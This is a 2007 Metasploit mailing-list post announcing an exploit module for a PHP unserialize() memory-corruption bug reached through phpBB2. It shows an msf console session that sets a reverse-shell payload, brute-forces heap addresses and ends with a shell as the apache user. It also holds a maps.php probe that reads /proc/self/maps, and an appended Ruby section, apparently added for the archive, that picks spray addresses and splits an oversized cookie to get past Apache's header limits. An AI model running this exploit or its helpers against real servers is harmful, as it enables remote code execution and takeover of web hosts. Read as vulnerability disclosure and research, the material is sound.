Metasploit mailing list archives
Metasploit 3 module for PHP < 4.5.0 unserialize() bug
From: hdm at metasploit.com (H D Moore)
Date: Sat, 10 Mar 2007 19:40:17 -0600
This is the first metasploit 3 exploit for a vulnerability covered by Stefan Esser's Month of PHP bugs. It exploits a PHP interpreter bug through a fully-patched version of phpBB2. We are still working on a "generic" exploit for all web applications that unserialize() POST data. This one was tricky because we had to work around the Apache 2 request limits to fit a ridiculous amount of data into multiple cookie headers. Stefan Esser should be credited with discovery, patch, the cookie technique, and the generic proof-of-concept. GML and I managed to hack this module together between last night and this afternoon.

This module sends about 3MB of traffic per request. It needs 900k just to trigger the vulnerability and uses another 2MB to make the brute force process somewhat fast. You will need a very fast network connection to use this module :-)

You can browse the module source online at:
http://metasploit.com/svn/framework3/trunk/modules/exploits/multi/php/php_unserialize_zval_phpbb2.rb

You can read more about the vulnerability at:
http://www.php-security.org/MOPB/MOPB-04-2007.html

Anyone with Metasploit 3 installed can just use 'svn update' to grab the latest patches along with this module.

We are looking for feedback about what address ranges to cover for various platforms. If you have a Linux system with PHP < 4.5.0, please install the following PHP code, access it in your browser, and send me the output. Your feedback is appreciated!
--start of maps.php---
<pre>
<?php
$buff = str_repeat("X", 1024*1024*4);
readfile("/proc/version");
readfile("/proc/self/maps");
?>
</pre>
--end of maps.php

Quick demonstration:

msf > use exploit/multi/php/php_unserialize_zval_phpbb2
msf exploit(php_unserialize_zval_phpbb2) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux x86 phpBB2

msf exploit(php_unserialize_zval_phpbb2) > set TARGET 0
TARGET => 0
msf exploit(php_unserialize_zval_phpbb2) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(php_unserialize_zval_phpbb2) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_unserialize_zval_phpbb2) > set RPORT 80
RPORT => 80
msf exploit(php_unserialize_zval_phpbb2) > set URI /faq.php
URI => /faq.php
msf exploit(php_unserialize_zval_phpbb2) > exploit
[*] Started reverse handler
[*] Creating the request...
[*] Trying address 0xb6000400...
[*] Received a response: 200 OK
[*] Trying address 0xb6100400...
[*] Received a response: 200 OK
[*] Trying address 0xb6200400...
[*] Received a response: 200 OK
[*] Trying address 0xb6300400...
[*] Received a response: 200 OK
[*] Trying address 0xb6400400...
[*] Received a response: 200 OK
[*] Trying address 0xb6500400...
[*] Received a response: 200 OK
[*] Trying address 0xb6600400...
[*] Received a response: 200 OK
[*] Trying address 0xb6700400...
[*] Received a response: 200 OK
[*] Trying address 0xb6800400...
[*] Received a response: 200 OK
[*] Trying address 0xb6900400...
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:50376)
[*] No response from the server

bash -i;
bash: no job control in this shell
apache@shank /home/httpd/phpBB2 $ id
uid=81(apache) gid=81(apache) groups=81(apache)
apache@shank /home/httpd/phpBB2 $

-HD
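The post asks for maps.php output to decide which address ranges the brute force should walk, and mentions that the oversized cookie data had to be split to get past Apache's request limits. The Ruby below is an added example written for this archive page, not code from the Metasploit module or from HD Moore: it parses a constructed /proc/self/maps excerpt (invented for the example, not from a real host), picks the large anonymous mapping that a 4MB str_repeat() buffer would occupy, derives a list of candidate addresses in 1MB steps like the ones in the transcript, and splits a cookie value across Cookie: lines sized to Apache httpd's default LimitRequestFieldSize (8190) and LimitRequestFields (100). The cookie name, the 1MB stride and the 0x400 offset are taken from the transcript or assumed for illustration; the post does not say how the module fits its 3MB into a request, so the splitter simply reports when the data does not fit in the default budget.

```ruby
# Added example, not the Metasploit module's code. Two helpers for the
# practical questions in the post: which addresses to try, and how to get
# a large value through Apache's per-header limits.

MapEntry = Struct.new(:start_addr, :end_addr, :perms, :path) do
  def size
    end_addr - start_addr
  end
end

# Parse /proc/self/maps text into MapEntry records (lines that do not look
# like maps entries are ignored).
def parse_maps(text)
  text.each_line.map do |line|
    m = line.match(/\A(\h+)-(\h+)\s+(\S{4})\s+\h+\s+\S+\s+\d+\s*(.*?)\s*\z/)
    m && MapEntry.new(m[1].hex, m[2].hex, m[3], m[4])
  end.compact
end

# A 4MB str_repeat() buffer is far above glibc's 128KB mmap threshold, so it
# lands in an anonymous rw mapping rather than in [heap]. Assumption for this
# example: the largest anonymous writable mapping of at least min_size is the
# region a sprayed request would also land in.
def spray_region(entries, min_size)
  entries.select { |e| e.perms.start_with?("rw") && e.path.empty? && e.size >= min_size }
         .max_by(&:size)
end

# One candidate per `stride` bytes from lo up to (not including) hi, each
# nudged by `offset` so it never sits exactly on a mapping boundary. The
# transcript walks 0xb6000400, 0xb6100400, ... in 1MB steps.
def address_candidates(lo, hi, stride: 0x100000, offset: 0x400)
  lo.step(hi - 1, stride).map { |base| base + offset }
end

# Apache httpd defaults: LimitRequestFieldSize 8190, LimitRequestFields 100.
APACHE_FIELD_SIZE  = 8190
APACHE_FIELD_COUNT = 100

# Split an already cookie-safe value (no ';', ',', '=' or whitespace) into
# "Cookie: name=chunk" lines, each at most max_line bytes. Raises when the
# value cannot fit in max_fields header lines.
def split_into_cookie_headers(value, name:, max_line: APACHE_FIELD_SIZE, max_fields: APACHE_FIELD_COUNT)
  raise ArgumentError, "value contains cookie delimiters" if value =~ /[;,=\s]/
  prefix = "Cookie: #{name}="
  chunk  = max_line - prefix.bytesize
  raise ArgumentError, "cookie name too long for one header line" if chunk < 1
  lines = value.scan(/.{1,#{chunk}}/m).map { |piece| prefix + piece }
  if lines.size > max_fields
    raise ArgumentError, "need #{lines.size} Cookie lines, server allows #{max_fields}"
  end
  lines
end

# Constructed maps excerpt for a 32-bit Linux Apache worker (made up for
# this example; collect the real one with maps.php from the post).
SAMPLE_MAPS = <<~MAPS
  08048000-08138000 r-xp 00000000 08:01 1234 /usr/sbin/apache2
  08138000-08148000 rw-p 000f0000 08:01 1234 /usr/sbin/apache2
  08148000-083a0000 rw-p 00000000 00:00 0    [heap]
  b5a00000-b5e01000 rw-p 00000000 00:00 0
  b5e01000-b6f50000 r-xp 00000000 08:01 5678 /usr/lib/apache2/modules/libphp4.so
  b6f50000-b6f60000 rw-p 00000000 00:00 0
  b7f00000-b7f21000 r-xp 00000000 08:01 9012 /lib/ld-2.3.6.so
  bfe00000-bfe16000 rw-p 00000000 00:00 0    [stack]
MAPS

if $PROGRAM_NAME == __FILE__
  region = spray_region(parse_maps(SAMPLE_MAPS), 4 * 1024 * 1024)
  puts format("spray region: %08x-%08x", region.start_addr, region.end_addr)
  address_candidates(region.start_addr, region.end_addr).each { |a| puts format("try 0x%08x", a) }
  # Cookie name is the phpBB2 default, used here only as an illustrative value.
  lines = split_into_cookie_headers("X" * 20_000, name: "phpbb2mysql_data")
  puts "#{lines.size} Cookie lines, longest #{lines.map(&:bytesize).max} bytes"
end
```

On the constructed host the 4MB mapping sits just below libphp4.so, so the walk covers it in five requests at a 1MB stride; against a real target, replace SAMPLE_MAPS with the output maps.php produced there. With the default header budget, 100 lines of a little under 8190 bytes each hold roughly 800KB, which is why the splitter raises for the 900k the post says the trigger needs.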
Current thread:
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug H D Moore (Mar 10)
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug Kashif Iftikhar (Mar 12)
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug Kashif Iftikhar (Mar 13)
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug H D Moore (Mar 17)
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug Kashif Iftikhar (Mar 12)